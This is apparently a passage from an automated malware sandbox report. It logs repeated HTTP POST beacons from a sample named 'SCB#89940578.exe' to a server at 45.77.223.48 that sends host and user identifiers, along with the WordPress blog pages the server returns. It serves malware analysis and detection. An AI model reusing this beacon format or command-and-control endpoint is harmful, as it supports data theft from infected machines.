                                            Apr 26, 2024 04:42:35.274310112 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:35.274322987 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:35.274430037 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:35.274444103 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            21192.168.2.44976345.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:35.607136965 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:35.794982910 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:36.697896957 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:35 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:36.698009968 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:36.698024988 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:36.705193043 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:36.705355883 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:36.705552101 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:36.705620050 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:36.705749989 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:36.705849886 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:36.706067085 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            22192.168.2.44976445.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:37.043735027 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:37.232678890 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:38.170217991 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:37 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:38.170311928 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:38.170370102 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:38.178224087 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:38.178570986 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:38.178637028 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:38.178733110 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:38.178906918 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:38.178941965 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:38.179009914 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            23192.168.2.44976545.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:38.508836031 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:38.696513891 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:39.559355974 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:38 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:39.559556007 CEST64INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
                                            Apr 26, 2024 04:42:39.559628963 CEST77INData Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:39.572813034 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:39.573214054 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:39.573529959 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:39.573616982 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:39.573712111 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:39.573837996 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:39.573941946 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.44976645.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:39.893816948 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:40.391865015 CEST395OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:41.327425003 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:40 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:41.327804089 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:41.327816010 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:41.337239027 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:41.337577105 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:41.337651968 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:41.337783098 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:41.337949991 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:41.338071108 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:41.338155031 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:42:41.514303923 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.44976745.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
